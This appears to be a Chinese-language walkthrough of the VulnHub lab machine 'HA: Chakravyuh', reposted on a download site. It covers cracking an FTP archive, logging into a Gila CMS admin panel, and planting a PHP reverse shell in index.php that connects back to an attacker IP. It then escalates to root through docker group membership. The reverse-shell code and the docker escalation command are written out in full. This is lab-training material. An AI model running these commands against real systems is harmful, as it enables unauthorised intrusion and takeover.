VulnHub靶场学习_HA: Chakravyuh

HA: Chakravyuh

Vulnhub靶场

下载地址:https://www.vulnhub.com/entry/ha-chakravyuh,388/

背景:

Close your eyes and feel the heat of being in the middle of the Chakravyuh. The Epic Battle formation that is said to uncrackable. Can you crack the Uncrackable? Does it have it in you? Crack this epic Challenge and Claim the Title of Arjuna of 21st Century.

 

ENUMERATION IS THE KEY!!!!!

VulnHub靶场学习_HA: Chakravyuh插图

端口扫描

VulnHub靶场学习_HA: Chakravyuh插图(1)

发现ftp中存在arjun.7z

 VulnHub靶场学习_HA: Chakravyuh插图(2)

扫描路径

VulnHub靶场学习_HA: Chakravyuh插图(3)

MySQL数据库

VulnHub靶场学习_HA: Chakravyuh插图(4)

收集到这些信息后,猜测Getshell的流程是,通过压缩包知道数据库账号密码,数据库拿shell。

所以,先爆破arjun.7z的密码

Fcrackzip这款软件前面的靶机用过,挺好的,但不支持7z

Rarcrack这款软件可以爆破7z,但不能跑字典,遍历太久不现实。

rarcrack arjun.7z –threads 10 –type 7z

 VulnHub靶场学习_HA: Chakravyuh插图(5)

最后,我用的是PasswareKit,速度还是挺快的,支持GPU加速,

利用软件本身携带的字典将其破解,压缩包内的txt文本文件。

 VulnHub靶场学习_HA: Chakravyuh插图(6)

密码是family。

 VulnHub靶场学习_HA: Chakravyuh插图(7)

Base64解密:

gila:[email protected]:princesa

不是数据库的密码。

 VulnHub靶场学习_HA: Chakravyuh插图(8)

看看是不是目录,前面的gila

http://192.168.139.140/gila/

http://192.168.139.140/gila/admin

VulnHub靶场学习_HA: Chakravyuh插图(9)

在Themes处有模板选择,点击文件图标能编辑模板文件。

 VulnHub靶场学习_HA: Chakravyuh插图(10)

这里能够上传任意文件,上传了个马。

 VulnHub靶场学习_HA: Chakravyuh插图(11)

这个马无法解析,因为shell.ph被URL重写,将所有的指向index.php处理。

 VulnHub靶场学习_HA: Chakravyuh插图(12)

这里能够获取到数据库的账号密码。

 VulnHub靶场学习_HA: Chakravyuh插图(13)

进入数据库。

 VulnHub靶场学习_HA: Chakravyuh插图(14)

VulnHub靶场学习_HA: Chakravyuh插图(15)

这里写入路径做了限制,不能直接写入shell,不过可以利用慢日志来获取shell。

同时该cms默认存在phpinfo。一般就是默认的/var/www/html/

 VulnHub靶场学习_HA: Chakravyuh插图(16)

但,这里不通过数据库Getshell

通过在index.php中写入反弹shell的代码Getshell

 VulnHub靶场学习_HA: Chakravyuh插图(17)

$sock=fsockopen(“192.168.139.1”,3418);exec(“/bin/sh -i <&3 >&3 2>&3”);

在PHP中执行如上代码的话,会把系统的标准输入输出重定向到/bin/sh里,导致php-fpm直接502,然后弹的shell也会瞬间掉了。

当系统没有禁用proc_popen的情况下,利用下面代码反弹shell。

$sock = fsockopen(‘192.168.139.1’,3418);

$descriptorspec = array(

        0 => $sock,

        1 => $sock,

        2 => $sock

);

$process = proc_open(‘/bin/sh’, $descriptorspec, $pipes);

proc_close($process);

 

成功反弹shell。

VulnHub靶场学习_HA: Chakravyuh插图(18)

python -c “import pty;pty.spawn(‘/bin/bash’);”

获取交互式shell

VulnHub靶场学习_HA: Chakravyuh插图(19)

查找提权的点

查找777权限文件

VulnHub靶场学习_HA: Chakravyuh插图(20)

查找suid的文件

 VulnHub靶场学习_HA: Chakravyuh插图(21)

在查看id时,发现该用户处于docker组。

可以利用docker提权,大概过程就是建立一个容器,将本机的文件加载其中。

docker run -v /:/hostOS -i -t chrisfosterelli/rootplease

详细情况可百度 docker提权。

VulnHub靶场学习_HA: Chakravyuh插图(22)

Cat /root/final.txt

VulnHub靶场学习_HA: Chakravyuh插图(23)

 

本站资源均源自网络,若涉及您的版权、知识产权或其他利益,请附上版权证明邮件告知。收到您的邮件后,我们将在72小时内删除。
若下载资源地址错误或链接跳转错误请联系站长。站长q:770044133。

» VulnHub靶场学习_HA: Chakravyuh

发表评论

免登录下载网,提供全网最优质的资源集合!